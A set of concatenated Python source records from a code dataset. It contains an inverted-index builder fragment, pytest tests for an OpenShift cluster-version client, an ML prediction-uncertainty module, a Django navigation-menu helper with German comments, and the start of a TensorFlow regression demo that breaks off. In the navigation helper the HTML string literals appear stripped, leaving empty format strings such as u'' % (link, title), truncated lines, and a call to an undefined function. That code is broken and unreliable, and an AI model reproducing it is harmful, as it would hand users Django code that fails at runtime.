doc_tag:\n doc_tag = 
self.clean(doc_tag)\n doc_terms=sorted(list(set(doc_tit+doc_des+doc_tag)))\n else:\n doc_terms=sorted(list(set(doc_tit+doc_des)))\n for term in doc_terms:\n if len(term)==0:\n continue\n doc_instance = {}\n doc_instance[\"term\"]=term\n doc_instance[\"docid\"]=doc_id\n doc_instance[\"tf_title\"]=doc_tit.count(term)\n doc_instance[\"tf_description\"]=doc_des.count(term)\n if doc_tag:\n doc_instance[\"tf_tag\"]=doc_tag.count(term)\n else:\n doc_instance[\"tf_tag\"]=0\n doc_json.append(doc_instance)\n return doc_json\n\n\n def sort_terms(self):\n \"\"\"Sort dictionary alphabetically\n \"\"\"\n doc_json = self.get_terms()\n doc_json = sorted(doc_json, key=lambda k: k['term'])\n self.fw.json_writer(doc_json)\n \n def clean(self, lst):\n \"\"\"Strip punctuation, lowercase and drop purely numeric tokens.\n \"\"\"\n remove_punctuation_map = dict((ord(char), None) for char in self.punc)\n lst = [x.translate(remove_punctuation_map) for x in lst]\n lst = [x.lower() for x in lst]\n lst = [x for x in lst if not x.isdigit()]\n return lst\n\n\n","sub_path":"src/bm25-f/inverted_index_init.py","file_name":"inverted_index_init.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"262022353","text":"from unittest import mock\n\nimport pytest\n\nfrom piqe_ocp_lib.api.constants import CLUSTER_VERSION_OPERATOR_ID\nfrom piqe_ocp_lib.api.resources.ocp_cluster_versions import OcpClusterVersion\n\n\n@pytest.fixture(scope=\"session\")\ndef ocp_cv(get_kubeconfig):\n kube_config_file = get_kubeconfig\n return OcpClusterVersion(kube_config_file=kube_config_file)\n\n\nclass TestOcpClusterVersion:\n def test_get_cluster_version(self, ocp_cv):\n \"\"\"\n Verify that cluster version response is returned.\n :param ocp_cv: OcpClusterVersion class object\n :return:\n \"\"\"\n expected_operator_name = \"version\"\n\n result = ocp_cv.get_cluster_version()\n\n assert result.metadata.name == expected_operator_name\n\n def test_get_cluster_id(self, ocp_cv):\n \"\"\"\n Verify that cluster ID is returned\n :param ocp_cv: OcpClusterVersion class object\n :return:\n \"\"\"\n cluster_version = ocp_cv.get_cluster_version()\n expected_cluster_id = cluster_version.spec.clusterID\n\n result = ocp_cv.get_cluster_id()\n\n assert isinstance(result, str)\n assert result == expected_cluster_id\n\n def test_build_spec_with_empty_input(self, ocp_cv):\n input_spec = {}\n cluster_version = ocp_cv.get_cluster_version()\n expected_output = {\n \"apiVersion\": ocp_cv.api_version,\n \"kind\": ocp_cv.kind,\n \"spec\": {\"clusterId\": cluster_version.spec.clusterID},\n \"metadata\": {\n \"name\": CLUSTER_VERSION_OPERATOR_ID,\n \"resourceVersion\": cluster_version.metadata.resourceVersion,\n },\n }\n\n result = ocp_cv._build_spec(input_spec)\n\n assert result == expected_output\n\n def test_build_spec_with_user_input(self, ocp_cv):\n input_spec = {\n \"metadata\": {\"foo\": \"bar\", \"name\": \"fake\"},\n \"spec\": {\"quick\": \"fox\", \"clusterId\": 1},\n }\n cluster_version = ocp_cv.get_cluster_version()\n expected_output = {\n \"apiVersion\": ocp_cv.api_version,\n \"kind\": ocp_cv.kind,\n \"spec\": {\n \"clusterId\": cluster_version.spec.clusterID, # replaced\n \"quick\": \"fox\", # merged\n },\n \"metadata\": {\n \"name\": CLUSTER_VERSION_OPERATOR_ID, # replaced\n \"resourceVersion\": cluster_version.metadata.resourceVersion,\n \"foo\": \"bar\", # merged\n },\n }\n\n result = ocp_cv._build_spec(input_spec)\n\n assert result == expected_output\n\n @pytest.mark.parametrize(\n \"available_updates,expected\",\n [\n (None, 
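# \"no-updates\" case: a None availableUpdates is expected to normalize to an empty list\n 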
[]),\n (\n [\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.8\",\n },\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.12\",\n },\n ],\n [\"4.6.8\", \"4.6.12\"],\n ),\n (\n [\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.12\",\n },\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.8\",\n },\n ],\n [\"4.6.12\", \"4.6.8\"],\n ),\n ],\n ids=[\"no-updates\", \"sorted\", \"reverse-sorted\"],\n )\n def test_available_updates(self, ocp_cv, available_updates, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_updates\n\n result = ocp_cv.available_updates()\n\n mock_version.assert_called_once()\n\n assert isinstance(result, list)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_updates,channel,expected\",\n [\n (\n [\n {\"channels\": [\"stable-4.6\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.12\"},\n {\"channels\": [\"stable-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n ],\n \"stable-4.6\",\n [\"4.6.12\"],\n ),\n (\n [\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.12\"},\n ],\n \"fast-4.7\",\n [\"4.6.8\", \"4.6.12\"],\n ),\n ],\n ids=[\"filter-stable\", \"filter-fast\"],\n )\n def test_available_updates_with_filter(self, ocp_cv, available_updates, channel, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_updates\n\n result = ocp_cv.available_updates(channel=channel)\n\n mock_version.assert_called_once()\n\n assert isinstance(result, list)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_channels,expected\",\n [\n (None, set()),\n (\n [\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.8\",\n },\n {\n \"channels\": [\"candidate-4.6\", \"foo-4.7\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.9\",\n },\n ],\n {\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\", \"foo-4.7\"},\n ),\n ],\n ids=[\"no-updates\", \"available-updates\"],\n )\n def test_available_channels(self, ocp_cv, available_channels, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_channels\n\n result = ocp_cv.available_channels()\n\n mock_version.assert_called_once()\n\n assert isinstance(result, set)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_updates,channel,expected\",\n [\n (\n [\n {\"channels\": [\"stable-4.6\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", 
\"version\": \"4.6.12\"},\n {\"channels\": [\"stable-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n ],\n \"foo\",\n set(),\n ),\n (\n [\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n {\"channels\": [\"fast-4.6\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.12\"},\n ],\n \"fast\",\n {\"fast-4.7\", \"fast-4.6\"},\n ),\n ],\n ids=[\"filter-nothing\", \"filter-fast\"],\n )\n def test_available_channels_with_filter(self, ocp_cv, available_updates, channel, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_updates\n\n result = ocp_cv.available_channels(kind=channel)\n\n mock_version.assert_called_once()\n\n assert isinstance(result, set)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_updates,expected\",\n [\n ([], None),\n ([\"4.6.8\", \"4.6.12\"], \"4.6.12\"),\n ([\"4.6.12\", \"4.6.8\"], \"4.6.8\"), # Always last element in the list\n ],\n ids=[\"no-updates\", \"sorted\", \"reverse-sorted\"],\n )\n def test_latest_update_available(self, ocp_cv, available_updates, expected):\n with mock.patch.object(ocp_cv, \"available_updates\") as mock_version:\n mock_version.return_value = available_updates\n\n result = ocp_cv.latest_update_available()\n\n mock_version.assert_called_once()\n\n assert result == expected\n\n def test_update_channel(self, ocp_cv):\n input_channel = \"fast-4.6\"\n\n with mock.patch.object(ocp_cv, \"_build_spec\") as mock_build:\n expected_spec = {\"spec\": {\"channel\": input_channel}}\n mock_build.return_value = {\"wrapped\": expected_spec}\n\n with mock.patch.object(ocp_cv, \"update_cluster_version\") as mock_update:\n mock_update.return_value = \"updated\"\n\n result = ocp_cv.update_channel(input_channel)\n\n mock_build.assert_called_once_with(expected_spec)\n mock_update.assert_called_once_with({\"wrapped\": expected_spec})\n\n assert result == \"updated\"\n\n def test_upgrade_cluster_version_without_timeout(self, ocp_cv):\n version = \"4.6.8\"\n force = False\n\n with mock.patch.object(ocp_cv, \"_build_spec\") as mock_build:\n expected_build_spec = {\n \"spec\": {\n \"desiredUpdate\": {\n \"force\": force,\n \"version\": version,\n }\n }\n }\n mock_build.return_value = mock.sentinel.build_spec\n with mock.patch.object(ocp_cv, \"update_cluster_version\") as mock_update:\n mock_update.return_value = mock.sentinel.update_cluster\n\n result = ocp_cv.upgrade_cluster_version(version, force, timeout=0)\n\n mock_update.assert_called_once_with(mock.sentinel.build_spec)\n mock_build.assert_called_once_with(expected_build_spec)\n\n assert result == mock.sentinel.update_cluster\n","sub_path":"piqe_ocp_lib/tests/resources/test_ocp_cluster_versions.py","file_name":"test_ocp_cluster_versions.py","file_ext":"py","file_size_in_byte":10729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"310288546","text":"import multiprocessing\n\nimport numpy\nimport sklearn\nfrom matplotlib import pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import brier_score_loss\n\nfrom pytolemaic.utils.constants import REGRESSION, CLASSIFICATION\nfrom pytolemaic.utils.dmd import DMD\nfrom pytolemaic.utils.general import GeneralUtils\nfrom pytolemaic.utils.metrics import Metrics\n\n\nclass UncertaintyModelBase():\n\n def __init__(self, 
model, uncertainty_method: str,\n ptype=None,\n supported_methods: list = None):\n self.model = model\n self.uncertainty_method = uncertainty_method\n self.dmd_supported = None\n self.is_classification = GeneralUtils.is_classification(model)\n\n if (self.is_classification and ptype != CLASSIFICATION) or \\\n (not self.is_classification and ptype == CLASSIFICATION):\n raise ValueError(\n \"{} does not support {}\".format(type(self), ptype))\n\n if self.uncertainty_method not in supported_methods:\n raise NotImplementedError(\n \"Uncertainty method {} is not in supported methods={}\".format(\n self.uncertainty_method, supported_methods))\n\n def uncertainty(self, dmd: DMD):\n raise NotImplementedError(\"\")\n\n def fit_uncertainty_model(self, dmd_test, **kwargs):\n raise NotImplementedError(\"\")\n\n def fit(self, dmd_test: DMD, **kwargs):\n self.dmd_supported = GeneralUtils.dmd_supported(model=self.model,\n dmd=dmd_test)\n\n self.fit_uncertainty_model(dmd_test, **kwargs)\n return self\n\n def predict(self, dmd: DMD):\n if self.dmd_supported:\n if not isinstance(dmd, DMD):\n dmd = DMD(x=dmd)\n return self.model.predict(dmd)\n else:\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n return self.model.predict(x)\n\n def predict_proba(self, dmd: DMD):\n if self.dmd_supported:\n if not isinstance(dmd, DMD):\n raise ValueError(\"DMD supported but input is not dmd\")\n return self.model.predict_proba(dmd)\n else:\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n return self.model.predict_proba(x)\n\n def plot_calibration_curve(self):\n raise NotImplementedError\n\n\nclass UncertaintyModelRegressor(UncertaintyModelBase):\n\n def __init__(self, model, uncertainty_method='rmse'):\n super(UncertaintyModelRegressor, self).__init__(\n model=model, uncertainty_method=uncertainty_method,\n ptype=REGRESSION, supported_methods=['mae', 'rmse'])\n self._n_bins = 10\n self.actual_error = None\n self.mean_predicted_error = None\n self._cal_curve_uncertainty = None\n\n def fit_uncertainty_model(self, dmd_test, n_jobs=multiprocessing.cpu_count() - 1,\n metric=Metrics.r2, **kwargs):\n\n dmd_test, cal_curve_samples = dmd_test.split(ratio=0.1)\n\n if self.uncertainty_method in ['mae']:\n estimator = RandomForestRegressor(\n random_state=0, n_jobs=n_jobs,\n n_estimators=kwargs.pop('n_estimators', 100))\n\n self.uncertainty_model = GeneralUtils.simple_imputation_pipeline(\n estimator)\n\n yp = self.predict(dmd_test)\n self.uncertainty_model.fit(dmd_test.values,\n numpy.abs(\n dmd_test.target.ravel() - yp.ravel()))\n elif self.uncertainty_method in ['rmse']:\n estimator = RandomForestRegressor(\n random_state=0, n_jobs=n_jobs,\n n_estimators=kwargs.pop('n_estimators', 100))\n\n self.uncertainty_model = GeneralUtils.simple_imputation_pipeline(\n estimator)\n\n yp = self.predict(dmd_test)\n self.uncertainty_model.fit(dmd_test.values,\n (dmd_test.target.ravel() - yp.ravel()) ** 2)\n\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n # calibration curve\n y_pred = self.predict(cal_curve_samples).ravel()\n y_true = cal_curve_samples.target.ravel()\n\n delta = numpy.abs(y_true - y_pred)\n uncertainty = self.uncertainty(cal_curve_samples).ravel()\n self._cal_curve_uncertainty = uncertainty\n\n bins = numpy.linspace(0., max(uncertainty) + 1e-8, self._n_bins + 1).ravel()\n binids = numpy.digitize(uncertainty, bins) - 1\n\n bin_sums = numpy.bincount(binids, weights=uncertainty, minlength=len(bins))\n bin_true = numpy.bincount(binids, 
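# with weights=delta, bincount accumulates the absolute error of every sample that falls in each bin\n 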
weights=delta, minlength=len(bins))\n bin_total = numpy.bincount(binids, minlength=len(bins))\n\n nonzero = bin_total != 0\n self.actual_error = (bin_true[nonzero] / bin_total[nonzero])\n self.mean_predicted_error = (bin_sums[nonzero] / bin_total[nonzero])\n\n # calibration curve by metric\n\n performance = []\n uncertainty_levels_middle = []\n for ibin in range(len(bins) - 1):\n inds = binids == ibin\n if numpy.sum(inds) < 5:\n continue\n\n subset_score = metric.function(y_true=y_true[inds], y_pred=y_pred[inds])\n performance.append(subset_score)\n uncertainty_levels_middle.append((bins[ibin] + bins[ibin + 1]) / 2)\n\n self._cal_curve_metric = {'uncertainty': uncertainty_levels_middle,\n 'score': performance,\n 'metric': metric.name}\n\n def uncertainty(self, dmd: DMD):\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n\n if self.uncertainty_method in ['mae']:\n out = self.uncertainty_model.predict(x)\n return out.reshape(-1, 1)\n elif self.uncertainty_method in ['rmse']:\n out = numpy.sqrt(self.uncertainty_model.predict(x))\n return out.reshape(-1, 1)\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n def plot_calibration_curve(self):\n fig = plt.figure(figsize=(10, 10))\n ax1 = plt.subplot2grid((3, 1), (0, 0), rowspan=2)\n ax2 = plt.subplot2grid((3, 1), (2, 0))\n\n ax1.plot([min(self.mean_predicted_error), max(self.mean_predicted_error)],\n [min(self.mean_predicted_error), max(self.mean_predicted_error)], \"k:\", label=\"Perfectly calibrated\")\n\n ax1.plot(self.mean_predicted_error, self.actual_error, \"s-\",\n color='b')\n\n # todo: remove _cal_curve_uncertainty from self\n ax2.hist(self._cal_curve_uncertainty, range=(0, 1.),\n bins=self._n_bins,\n color='b',\n histtype=\"step\", lw=2)\n\n ax1.set_ylabel(\"Actual error\")\n ax1.set_ylim([min(self.actual_error) * 0.95, max(self.actual_error) * 1.05])\n ax1.legend(loc=\"lower right\")\n ax1.set_title(\"Calibartion Curve for method {} (Regression)\".format(self.uncertainty_method))\n\n ax2.set_xlabel(\"Mean predicted error\")\n ax2.set_ylabel(\"Count\")\n ax2.legend(loc=\"upper center\", ncol=2)\n\n # curve by metric\n plt.figure()\n plt.plot(self._cal_curve_metric['uncertainty'], self._cal_curve_metric['score'], '*-r')\n\n plt.xlabel(\"Uncertainty level ({})\".format(self.uncertainty_method))\n plt.ylabel(\"{} score\".format(self._cal_curve_metric['metric']))\n plt.title(\"{} score vs uncertainty level\".format(self._cal_curve_metric['metric']))\n\n\nclass UncertaintyModelClassifier(UncertaintyModelBase):\n\n def __init__(self, model, uncertainty_method='confidence'):\n super(UncertaintyModelClassifier, self).__init__(model=model,\n uncertainty_method=uncertainty_method,\n ptype=CLASSIFICATION,\n supported_methods=[\n 'probability',\n 'confidence']\n )\n\n self._brier_loss = -1\n self._fraction_of_positives = None\n self._mean_uncertainty = None\n self._cal_curve_uncertainty = None\n self._n_bins = 10\n\n def fit_uncertainty_model(self, dmd_test, n_jobs=multiprocessing.cpu_count() - 1,\n metric=Metrics.recall,\n **kwargs):\n\n if self.uncertainty_method in ['probability']:\n cal_curve_samples = dmd_test\n # no fit logic required\n\n elif self.uncertainty_method in ['confidence']:\n dmd_test, cal_curve_samples = dmd_test.split(ratio=0.1)\n\n estimator = RandomForestClassifier(\n random_state=0, n_jobs=n_jobs, n_estimators=100)\n\n self.uncertainty_model = GeneralUtils.simple_imputation_pipeline(\n estimator)\n\n y_pred = self.predict(dmd_test)\n is_correct = 
numpy.array(y_pred.ravel() == dmd_test.target.ravel(),\n dtype=int)\n\n # bug here\n self.uncertainty_model.fit(dmd_test.values, is_correct.ravel())\n\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n # calibration curve\n\n y_pred = self.predict(cal_curve_samples).ravel()\n y_true = cal_curve_samples.target.ravel()\n uncertainty = self.uncertainty(cal_curve_samples)\n self._cal_curve_uncertainty = uncertainty\n\n self._fraction_of_positives, self._mean_uncertainty = sklearn.calibration.calibration_curve(\n y_true=y_pred == y_true,\n y_prob=uncertainty,\n normalize=True,\n n_bins=self._n_bins,\n strategy='uniform')\n\n sample_weight = None\n self._brier_loss = brier_score_loss(\n y_true=y_pred == y_true,\n y_prob=1 - uncertainty,\n sample_weight=sample_weight,\n pos_label=1)\n\n # calibration curve by metric\n\n uncertainty = uncertainty / max(uncertainty)\n\n bins = numpy.linspace(0., max(uncertainty) + 1e-8, 5 + 1)\n binids = numpy.digitize(uncertainty.flatten(), bins.ravel()) - 1\n\n performance = []\n uncertainty_levels_middle = []\n for ibin in range(len(bins) - 1):\n inds = binids == ibin\n if numpy.sum(inds) < 5:\n continue\n\n subset_score = metric.function(y_true=y_true[inds], y_pred=y_pred[inds])\n performance.append(subset_score)\n uncertainty_levels_middle.append((bins[ibin] + bins[ibin + 1]) / 2)\n\n self._cal_curve_metric = {'uncertainty': uncertainty_levels_middle,\n 'score': performance,\n 'metric': metric.name}\n\n def uncertainty(self, dmd: DMD):\n\n if self.uncertainty_method in ['probability']:\n yproba = self.predict_proba(dmd)\n yproba += 1e-10 * numpy.random.RandomState(0).rand(*yproba.shape)\n max_probability = numpy.max(yproba, axis=1).reshape(-1, 1)\n delta = max_probability - yproba\n yproba[delta == 0] = 0\n\n # delta[numpy.sum(delta, axis=1)>=20,:] = 0 # i\n out = numpy.max(yproba, axis=1).reshape(-1, 1) / max_probability\n return GeneralUtils.f5(out).reshape(-1, 1)\n elif self.uncertainty_method in ['confidence']:\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n # return the probability it's a mistake\n out = self.uncertainty_model.predict_proba(x)[:, 0]\n return GeneralUtils.f5(out).reshape(-1, 1)\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n def plot_calibration_curve(self):\n fig = plt.figure(figsize=(10, 10))\n ax1 = plt.subplot2grid((3, 1), (0, 0), rowspan=2)\n ax2 = plt.subplot2grid((3, 1), (2, 0))\n\n ax1.plot([0, 1], [1, 0.5], \"k:\", label=\"Perfectly calibrated\")\n\n ax1.plot(self._mean_uncertainty, self._fraction_of_positives, \"s-\",\n color='b',\n label=\"brier loss=%1.3f\" % self._brier_loss)\n\n # todo: remove y_proba from self\n ax2.hist(self._cal_curve_uncertainty, range=(0, 1.),\n bins=self._n_bins,\n color='b',\n histtype=\"step\", lw=2)\n\n ax1.set_ylabel(\"Fraction of correct predictions\")\n ax1.set_ylim([-0.05, 1.05])\n ax1.legend(loc=\"lower right\")\n ax1.set_title(\"Calibartion Curve for method {}\".format(self.uncertainty_method))\n\n ax2.set_xlabel(\"Mean uncertainty\")\n ax2.set_ylabel(\"Count\")\n ax2.legend(loc=\"upper center\", ncol=2)\n\n # curve by metric\n plt.figure()\n plt.plot(self._cal_curve_metric['uncertainty'], self._cal_curve_metric['score'], '*-r')\n\n plt.xlabel(\"Uncertainty level ({})\".format(self.uncertainty_method))\n plt.ylabel(\"{} score\".format(self._cal_curve_metric['metric']))\n plt.title(\"{} score vs uncertainty 
level\".format(self._cal_curve_metric['metric']))\n","sub_path":"pytolemaic/prediction_uncertainty/uncertainty_model.py","file_name":"uncertainty_model.py","file_ext":"py","file_size_in_byte":13803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"271592623","text":"#-*-coding: utf-8 -*-\n\"\"\"\n/dms/utils_navigation.py\n\n.. enthaelt Hilfsroutinen zurm Aendern des linken Navigationsbereichs\n Django content Management System\n\nHans Rauch\nhans.rauch@gmx.net\n\nDie Programme des dms-Systems koennen frei genutzt und den spezifischen\nBeduerfnissen entsprechend angepasst werden.\n\n0.01 12.03.2007 Beginn der Arbeit\n0.02 11.10.2007 item.is_main_menu\n\"\"\"\n\nimport string\n\nfrom django.utils.safestring import SafeData, mark_safe, SafeUnicode\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import delete_menuitem_navmenu_left\nfrom dms.queries import get_menuitems_by_menu_id_left\nfrom dms.queries import get_new_navmenu_left\nfrom dms.queries import delete_menuitem_navmenu_top\nfrom dms.queries import get_new_navmenu_top\n\nfrom dms.encode_decode import decode_html\n\n# -----------------------------------------------------\ndef get_navmenu_choices_left(menu_id):\n \"\"\" Auswahl des Navigationsmenus \"\"\"\n ret = []\n ret.append( ('|', mark_safe(_('(Lokale) Startseite'))) )\n menu = get_menuitems_by_menu_id_left(menu_id)[0]\n lines = string.splitfields(menu.navigation, '\\n')\n nav_main = ''\n nav_sub = ''\n for line in lines:\n line = string.strip(line)\n if line != '' and line[0] != '#':\n arr = string.splitfields(line, '|')\n if len(arr) > 1:\n my_depth = int(string.strip(arr[0]))\n my_alias = string.strip(arr[1])\n if my_depth == 0:\n nav_main = my_alias\n nav_sub = ''\n else:\n nav_sub = my_alias\n info = string.strip(arr[3])\n if my_depth == 0:\n info = '' + info + ''\n ret.append( (nav_main + '|' + nav_sub, mark_safe(info)) )\n return ret\n\n# -----------------------------------------------------\ndef get_data_left(line):\n \"\"\" Beschreibung der linken Navigation \"\"\"\n line = string.strip(line)\n if line == '' or line[0] == '#':\n return -1, -1, ''\n arr = string.splitfields(line, '|')\n if len(arr) == 1:\n return -999, -1, '
\\n'\n else:\n ret = ''\n my_depth = int(string.strip(arr[0]))\n my_alias = string.strip(arr[1])\n link = string.strip(arr[2])\n info = string.strip(arr[3])\n if len(arr) > 4:\n title = string.replace(string.strip(arr[4]), '\"', '"')\n else:\n title = ''\n if len(arr) > 5 :\n ret += string.replace(arr[5], '"', '\"') + ' '\n ret += u'' % (link, title)\n ret += '' + info + '|'\n else:\n ret += u'' % (link, title)\n ret += info + '|'\n return my_depth, my_alias, ret\n\n# -----------------------------------------------------\ndef get_top_navigation_menu_left(lines):\n \"\"\" Beschreibung der oberen Navigation \"\"\"\n ret = ''\n for line in lines:\n my_depth, my_alias, res = get_data_left(line)\n if my_depth == 0:\n if res != '' and string.find(res, ' 1:\n ret = ''\n my_alias = string.strip(arr[0])\n link = string.strip(arr[1])\n info = string.strip(arr[2])\n if len(arr) > 3:\n title = string.replace(string.strip(arr[3]), '\"', '"')\n else:\n title = ''\n if len(arr) > 4 :\n prefix = string.replace(arr[4], '"', '\"') + ' '\n else:\n prefix = ''\n if len(arr) > 5:\n target = ' target=\"_extern\"'\n else:\n target = ''\n if nav_main != '' and nav_main == my_alias:\n link = u'' + \\\n '  %s  ' % info\n ret += prefix + link\n else:\n c = 'navTopLink'\n start_of_link = ''\n end_of_link = ''\n ret += u'' % (c, link, title, target)\n ret += prefix + start_of_link + info + end_of_link + ''\n #assert False\n return my_alias, ret\n\n# -----------------------------------------------------\ndef get_top_navigation_menu_top(lines, profi_mode):\n \"\"\" liefert das oberste Menu \"\"\"\n ret = ''\n for line in lines:\n my_alias, res = get_data_top(line, 'start', profi_mode)\n if my_alias > -1:\n if ret != '':\n ret += ' | '\n ret += res\n return ret\n\n# -----------------------------------------------------\ndef get_top_navigation_menu(lines, nav_main, profi_mode):\n \"\"\" liefert das obere Hauptmenu \"\"\"\n ret = ''\n for line in lines:\n my_alias, res = get_data_top(line, nav_main, profi_mode)\n if my_alias > -1:\n if ret != '':\n ret += ' | '\n ret += res\n return ret\n\n# -----------------------------------------------------\ndef get_navigation_menu(lines, *args):\n \"\"\" liefert das linke Menu \"\"\"\n n_args = 0\n menu = []\n for n in xrange(4):\n try:\n menu.append(args[n])\n n_args += 1\n except:\n menu.append('')\n ret = u''\n select = 0\n for line in lines:\n my_depth, my_alias, res = get_data_left(line)\n if res != '' and string.find(res, '\\n'\n elif my_depth == 0 or select == 2:\n ret += res_start + res + res_end\n if select == 1:\n ret += '
\\n'\n select = 2\n if select == 2:\n ret += '
\\n\\n\\n'\n return ret\n\n# -----------------------------------------------------\ndef get_menu_data(id=1):\n \"\"\" returns the menu data \"\"\"\n menu = get_menuitems_by_id_navmenu_left(id)[0]\n return menu.navigation\n\n# -----------------------------------------------------\ndef save_menus_left(menu_id, text, is_main_menu=False):\n \"\"\" stores the menus in the database \"\"\"\n\n def save_this_menu (menu_id, name, navigation, is_main_menu):\n item = get_new_navmenu_left()\n item.menu_id = menu_id\n item.name = name\n item.navigation = navigation\n item.is_main_menu = is_main_menu\n item.save()\n\n lines = string.splitfields(text, '\\n')\n\n delete_menuitem_navmenu_left(menu_id)\n menu = get_top_navigation_menu_left(lines)\n save_this_menu(menu_id, '|', menu, is_main_menu)\n\n nav_main = ''\n nav_sub = ''\n nav_sub_sub = ''\n for line in lines:\n line = string.strip(line)\n if line != '' and line[0] != '#':\n arr = string.splitfields(line, '|')\n if len(arr) > 1:\n my_depth = int(string.strip(arr[0]))\n my_alias = string.strip(arr[1])\n if my_depth == 0:\n nav_main = my_alias\n nav_sub = ''\n nav_sub_sub = ''\n elif my_depth == 1:\n nav_sub = my_alias\n nav_sub_sub = ''\n else:\n nav_sub_sub = my_alias\n info = string.strip(arr[3])\n if nav_sub == '':\n menu = get_navigation_menu(lines, nav_main)\n elif nav_sub_sub == '':\n menu = get_navigation_menu(lines, nav_main, nav_sub)\n else:\n menu = get_navigation_menu(lines, nav_main, nav_sub, nav_sub_sub)\n save_this_menu(menu_id, nav_main + '|' + nav_sub, menu, is_main_menu)\n\n# -----------------------------------------------------\ndef save_menus_top(menu_id, text, profi_mode=False):\n \"\"\" stores the top main menu \"\"\"\n\n def save_this_menu (menu_id, name, navigation):\n item = get_new_navmenu_top()\n item.menu_id = menu_id\n item.name = name\n item.navigation = navigation\n item.save()\n\n #if not profi_mode:\n # text = decode_html(text)\n lines = string.splitfields(text, '\\n')\n\n delete_menuitem_navmenu_top(menu_id)\n menu = get_top_navigation_menu_top(lines, profi_mode)\n save_this_menu(menu_id, '|', menu)\n\n nav_main = ''\n for line in lines:\n line = string.strip(line)\n if line != '' and line[0] != '#':\n arr = string.splitfields(line, '|')\n if len(arr) > 1:\n my_alias = string.strip(arr[0])\n nav_main = my_alias\n info = string.strip(arr[3])\n menu = get_top_navigation_menu(lines, nav_main, profi_mode)\n save_this_menu(menu_id, nav_main, menu)\n\n# -----------------------------------------------------\ndef save_menu_left_new(menu_id, name, description, navigation, is_main_menu=False):\n \"\"\" creates a new menu in the database \"\"\"\n item = get_new_navmenu_left()\n item.menu_id = menu_id\n item.name = name\n item.description = description\n item.navigation = navigation\n item.is_main_menu = is_main_menu\n item.save()\n","sub_path":"utils_navigation.py","file_name":"utils_navigation.py","file_ext":"py","file_size_in_byte":9601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"510826188","text":"# import necessary packages\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n# create random points\nnum_points = 1000\npoints = []\nfor i in range(num_points):\n x1= np.random.normal(0.0, 0.55)\n y1= x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)\n points.append([x1, y1])\nx_data = [v[0] for v in points]\ny_data = [v[1] for v in points]\n\n\n# display points\nplt.plot(x_data, y_data, 'ro')\nplt.legend()\nplt.show()\n\n# start 
